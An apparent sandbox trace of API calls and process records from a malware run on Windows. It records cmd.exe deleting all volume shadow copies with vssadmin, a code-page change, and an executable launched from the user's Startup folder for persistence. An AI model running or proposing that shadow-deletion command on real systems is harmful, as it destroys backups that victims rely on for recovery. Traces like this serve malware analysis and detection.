	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0137.585] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16
	[0137.585] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0137.585] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0137.585] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0137.585] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0137.585] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0137.585] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0137.585] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0137.585] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0137.585] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0137.585] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0137.585] GetProcessHeap () returned 0x1f0000
	[0137.585] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x204660 | out: hHeap=0x1f0000) returned 1
	[0137.585] GetProcessHeap () returned 0x1f0000
	[0137.585] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x12) returned 0x209ac0
	[0137.585] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x15ef10*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="vssadmin  delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x15eec0 | out: lpCommandLine="vssadmin  delete shadows /all /quiet", lpProcessInformation=0x15eec0*(hProcess=0x50, hThread=0x54, dwProcessId=0x794, dwThreadId=0x798)) returned 1
	[0137.591] CloseHandle (hObject=0x54) returned 1
	[0137.591] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0137.591] GetProcessHeap () returned 0x1f0000
	[0137.591] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20f4e0 | out: hHeap=0x1f0000) returned 1
	[0137.591] GetEnvironmentStringsW () returned 0x2089c0*
	[0137.591] GetProcessHeap () returned 0x1f0000
	[0137.591] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xb22) returned 0x20e9b0
	[0137.591] FreeEnvironmentStringsW (penv=0x2089c0) returned 1
	[0137.591] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x15e7c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x15e7c8, ReturnLength=0x0) returned 0x0
	[0137.591] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffdf000, lpBuffer=0x15e800, nSize=0x380, lpNumberOfBytesRead=0x15e7c0 | out: lpBuffer=0x15e800*, lpNumberOfBytesRead=0x15e7c0*=0x380) returned 1
	[0137.592] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0140.100] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x15ee08 | out: lpExitCode=0x15ee08*=0x2) returned 1
	[0140.100] CloseHandle (hObject=0x50) returned 1
	[0140.100] _vsnwprintf (in: _Buffer=0x15f078, _BufferCount=0x13, _Format="%08X", _ArgList=0x15ee18 | out: _Buffer="00000002") returned 8
	[0140.100] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0140.100] GetProcessHeap () returned 0x1f0000
	[0140.100] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20e9b0 | out: hHeap=0x1f0000) returned 1
	[0140.100] GetEnvironmentStringsW () returned 0x2089c0*
	[0140.100] GetProcessHeap () returned 0x1f0000
	[0140.100] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xb22) returned 0x20e9b0
	[0140.100] FreeEnvironmentStringsW (penv=0x2089c0) returned 1
	[0140.100] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0140.101] GetProcessHeap () returned 0x1f0000
	[0140.101] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20e9b0 | out: hHeap=0x1f0000) returned 1
	[0140.101] GetEnvironmentStringsW () returned 0x2089c0*
	[0140.101] GetProcessHeap () returned 0x1f0000
	[0140.101] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xb22) returned 0x20e9b0
	[0140.101] FreeEnvironmentStringsW (penv=0x2089c0) returned 1
	[0140.101] GetProcessHeap () returned 0x1f0000
	[0140.101] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x209ac0 | out: hHeap=0x1f0000) returned 1
	[0140.101] DeleteProcThreadAttributeList (in: lpAttributeList=0x15eed8 | out: lpAttributeList=0x15eed8) 
	[0140.101] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1
	[0140.102] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0140.102] SetConsoleMode (hConsoleHandle=0xf8, dwMode=0x0) returned 0
	[0140.102] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0140.102] GetConsoleMode (in: hConsoleHandle=0xf8, lpMode=0x4a43e194 | out: lpMode=0x4a43e194) returned 0
	[0140.102] _get_osfhandle (_FileHandle=0) returned 0xec
	[0140.102] GetConsoleMode (in: hConsoleHandle=0xec, lpMode=0x4a43e198 | out: lpMode=0x4a43e198) returned 0
	[0140.102] GetConsoleOutputCP () returned 0x4e3
	[0140.102] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a44bfe0 | out: lpCPInfo=0x4a44bfe0) returned 1
	[0140.102] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0140.102] GetProcessHeap () returned 0x1f0000
	[0140.102] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x209c60 | out: hHeap=0x1f0000) returned 1
	[0140.102] GetProcessHeap () returned 0x1f0000
	[0140.103] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20ba00 | out: hHeap=0x1f0000) returned 1
	[0140.103] GetProcessHeap () returned 0x1f0000
	[0140.103] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x205bb0 | out: hHeap=0x1f0000) returned 1
	[0140.103] GetProcessHeap () returned 0x1f0000
	[0140.103] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20b9a0 | out: hHeap=0x1f0000) returned 1
	[0140.103] GetProcessHeap () returned 0x1f0000
	[0140.103] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x209a50 | out: hHeap=0x1f0000) returned 1
	[0140.103] GetProcessHeap () returned 0x1f0000
	[0140.103] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20aae0 | out: hHeap=0x1f0000) returned 1
	[0140.103] GetProcessHeap () returned 0x1f0000
	[0140.103] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x210090 | out: hHeap=0x1f0000) returned 1
	[0140.103] GetProcessHeap () returned 0x1f0000
	[0140.103] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x204630 | out: hHeap=0x1f0000) returned 1
	[0140.103] GetProcessHeap () returned 0x1f0000
	[0140.103] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x209840 | out: hHeap=0x1f0000) returned 1
	[0140.103] _vsnwprintf (in: _Buffer=0x4a456340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x15f338 | out: _Buffer="\r\n") returned 2
	[0140.103] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0140.103] GetFileType (hFile=0xf8) returned 0x3
	[0140.103] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0140.103] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
	[0140.103] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x15f308, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f308*=0x2, lpOverlapped=0x0) returned 1
	[0140.103] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a43f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4
	[0140.103] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a44c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0140.103] _vsnwprintf (in: _Buffer=0x4a43eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x15f348 | out: _Buffer="C:\\Windows\\system32") returned 19
	[0140.103] _vsnwprintf (in: _Buffer=0x4a43eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x15f348 | out: _Buffer=">") returned 1
	[0140.103] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0140.103] GetFileType (hFile=0xf8) returned 0x3
	[0140.104] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0140.104] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21
	[0140.104] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x15f338, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f338*=0x14, lpOverlapped=0x0) returned 1
	[0140.104] _get_osfhandle (_FileHandle=0) returned 0xec
	[0140.104] GetFileType (hFile=0xec) returned 0x3
	[0140.104] _get_osfhandle (_FileHandle=0) returned 0xec
	[0140.104] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0140.104] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0140.104] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e320, cchWideChar=1 | out: lpWideCharStr="Essadmin delete shadows /all /quiet\n") returned 1
	[0140.104] _get_osfhandle (_FileHandle=0) returned 0xec
	[0140.104] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0140.104] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0140.104] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e322, cchWideChar=1 | out: lpWideCharStr="xsadmin delete shadows /all /quiet\n") returned 1
	[0140.104] _get_osfhandle (_FileHandle=0) returned 0xec
	[0140.104] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0140.104] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0140.104] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e324, cchWideChar=1 | out: lpWideCharStr="iadmin delete shadows /all /quiet\n") returned 1
	[0140.104] _get_osfhandle (_FileHandle=0) returned 0xec
	[0140.104] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0140.104] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0140.104] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e326, cchWideChar=1 | out: lpWideCharStr="tdmin delete shadows /all /quiet\n") returned 1
	[0140.104] _get_osfhandle (_FileHandle=0) returned 0xec
	[0140.104] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0140.104] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0140.104] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e328, cchWideChar=1 | out: lpWideCharStr="\nmin delete shadows /all /quiet\n") returned 1
	[0140.104] _get_osfhandle (_FileHandle=0) returned 0xec
	[0140.105] GetFileType (hFile=0xec) returned 0x3
	[0140.105] _get_osfhandle (_FileHandle=0) returned 0xec
	[0140.105] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0140.105] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0140.105] GetFileType (hFile=0xf8) returned 0x3
	[0140.105] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0140.105] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="Exit\n", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Exit\n", lpUsedDefaultChar=0x0) returned 6
	[0140.105] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x15f618, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f618*=0x5, lpOverlapped=0x0) returned 1
	[0140.105] GetProcessHeap () returned 0x1f0000
	[0140.105] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x4012) returned 0x212010
	[0140.105] GetProcessHeap () returned 0x1f0000
	[0140.105] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x212010 | out: hHeap=0x1f0000) returned 1
	[0140.105] GetProcessHeap () returned 0x1f0000
	[0140.105] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xb0) returned 0x209840
	[0140.105] GetProcessHeap () returned 0x1f0000
	[0140.105] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x1a) returned 0x204630
	[0140.105] GetConsoleOutputCP () returned 0x4e3
	[0140.105] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a44bfe0 | out: lpCPInfo=0x4a44bfe0) returned 1
	[0140.105] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0140.106] GetConsoleTitleW (in: lpConsoleTitle=0x15f5d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0140.106] GetProcessHeap () returned 0x1f0000
	[0140.106] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x14) returned 0x208940
	[0140.106] GetProcessHeap () returned 0x1f0000
	[0140.106] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x1a) returned 0x204660
	[0140.106] GetProcessHeap () returned 0x1f0000
	[0140.106] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x21c) returned 0x20b9a0
	[0140.106] GetConsoleTitleW (in: lpConsoleTitle=0x20b9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0140.106] GetProcessHeap () returned 0x1f0000
	[0140.106] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x20b9a0, Size=0x62) returned 0x20b9a0
	[0140.106] GetProcessHeap () returned 0x1f0000
	[0140.106] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x20b9a0) returned 0x62
	[0140.106] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - Exit") returned 1
	[0140.106] GetProcessHeap () returned 0x1f0000
	[0140.106] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20b9a0 | out: hHeap=0x1f0000) returned 1
	[0140.107] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1
	[0140.107] exit (_Code=2) 

Process:
	id = "10"
	image_name = "mode.com"
	filename = "c:\\windows\\system32\\mode.com"
	page_root = "0x70d74000"
	os_pid = "0x75c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "9"
	os_parent_pid = "0x730"
	cmd_line = "mode  con cp select=1251"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ecd5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 53
	os_tid = 0x760


Process:
	id = "11"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\system32\\vssadmin.exe"
	page_root = "0x71481000"
	os_pid = "0x794"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "9"
	os_parent_pid = "0x730"
	cmd_line = "vssadmin  delete shadows /all /quiet"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ecd5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 66
	os_tid = 0x798


Thread:
	id = 68
	os_tid = 0x7a4


Thread:
	id = 70
	os_tid = 0x7ac


Thread:
	id = 71
	os_tid = 0x7b0


Thread:
	id = 72
	os_tid = 0x7b4


Process:
	id = "12"
	image_name = "gjfkyfli;.exe"
	filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe"
	page_root = "0x60d7c000"
	os_pid = "0x7b8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "8"
	os_parent_pid = "0x5e0"
	cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe\" -a"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ecd5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 73
	os_tid = 0x600

	[0169.574] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x467e2b20, dwHighDateTime=0x1d58eee)) 
	[0169.574] GetCurrentThreadId () returned 0x600
	[0169.574] GetCurrentProcessId () returned 0x7b8
	[0169.574] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=11483527075) returned 1
	[0169.575] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x775afd35, hStdError=0x77617daf)) 
	[0169.575] GetProcessHeap () returned 0x79d0000
	[0169.576] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0169.576] GetProcAddress (hModule=0x77080000, lpProcName=0x411d04) returned 0x77094f2b
	[0169.577] GetProcAddress (hModule=0x77080000, lpProcName="FlsFree") returned 0x7709359f
	[0169.577] GetProcAddress (hModule=0x77080000, lpProcName="FlsGetValue") returned 0x77091252
	[0169.577] GetProcAddress (hModule=0x77080000, lpProcName="FlsSetValue") returned 0x77094208
	[0169.577] GetProcAddress (hModule=0x77080000, lpProcName="InitializeCriticalSectionEx") returned 0x77094d28
	[0169.577] GetProcAddress (hModule=0x77080000, lpProcName="CreateEventExW") returned 0x7711410b
	[0169.577] GetProcAddress (hModule=0x77080000, lpProcName="CreateSemaphoreExW") returned 0x77114195
	[0169.577] GetProcAddress (hModule=0x77080000, lpProcName="SetThreadStackGuarantee") returned 0x7709d31f
	[0169.577] GetProcAddress (hModule=0x77080000, lpProcName="CreateThreadpoolTimer") returned 0x770aee7e
	[0169.577] GetProcAddress (hModule=0x77080000, lpProcName="SetThreadpoolTimer") returned 0x775d441c
	[0169.577] GetProcAddress (hModule=0x77080000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x775fc50e
	[0169.577] GetProcAddress (hModule=0x77080000, lpProcName="CloseThreadpoolTimer") returned 0x775fc381
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="CreateThreadpoolWait") returned 0x770af088
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="SetThreadpoolWait") returned 0x775e05d7
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="CloseThreadpoolWait") returned 0x775fca24
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="FlushProcessWriteBuffers") returned 0x775b0b8c
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7766fde8
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="GetCurrentProcessorNumber") returned 0x77601e1d
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="GetLogicalProcessorInformation") returned 0x77114761
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="CreateSymbolicLinkW") returned 0x7710cd11
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="SetDefaultDllDirectories") returned 0x0
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="EnumSystemLocalesEx") returned 0x7711424f
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="CompareStringEx") returned 0x771146b1
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="GetDateFormatEx") returned 0x77126676
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="GetLocaleInfoEx") returned 0x77114751
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="GetTimeFormatEx") returned 0x771265f1
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="GetUserDefaultLocaleName") returned 0x771147c1
	[0169.578] GetProcAddress (hModule=0x77080000, lpProcName="IsValidLocaleName") returned 0x771147e1
	[0169.579] GetProcAddress (hModule=0x77080000, lpProcName="LCMapStringEx") returned 0x771147f1
	[0169.579] GetProcAddress (hModule=0x77080000, lpProcName="GetCurrentPackageId") returned 0x0
	[0169.579] GetProcAddress (hModule=0x77080000, lpProcName="GetTickCount64") returned 0x770aeee0
	[0169.579] GetProcAddress (hModule=0x77080000, lpProcName="GetFileInformationByHandleExW") returned 0x0
	[0169.579] GetProcAddress (hModule=0x77080000, lpProcName="SetFileInformationByHandleW") returned 0x0
	[0169.579] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x3bc) returned 0x79e1f00
	[0169.579] GetCurrentThreadId () returned 0x600
	[0169.579] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x0, Size=0x18) returned 0x79e0998
	[0169.579] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x800) returned 0x79e22c8
	[0169.579] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4054f2, hStdOutput=0xebd3136b, hStdError=0x0)) 
	[0169.580] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0169.580] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0169.580] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0169.580] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe\" -a"
	[0169.580] GetEnvironmentStringsW () returned 0x79e2ad0*
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x0, Size=0xaca) returned 0x79e35a8
	[0169.580] FreeEnvironmentStringsW (penv=0x79e2ad0) returned 1
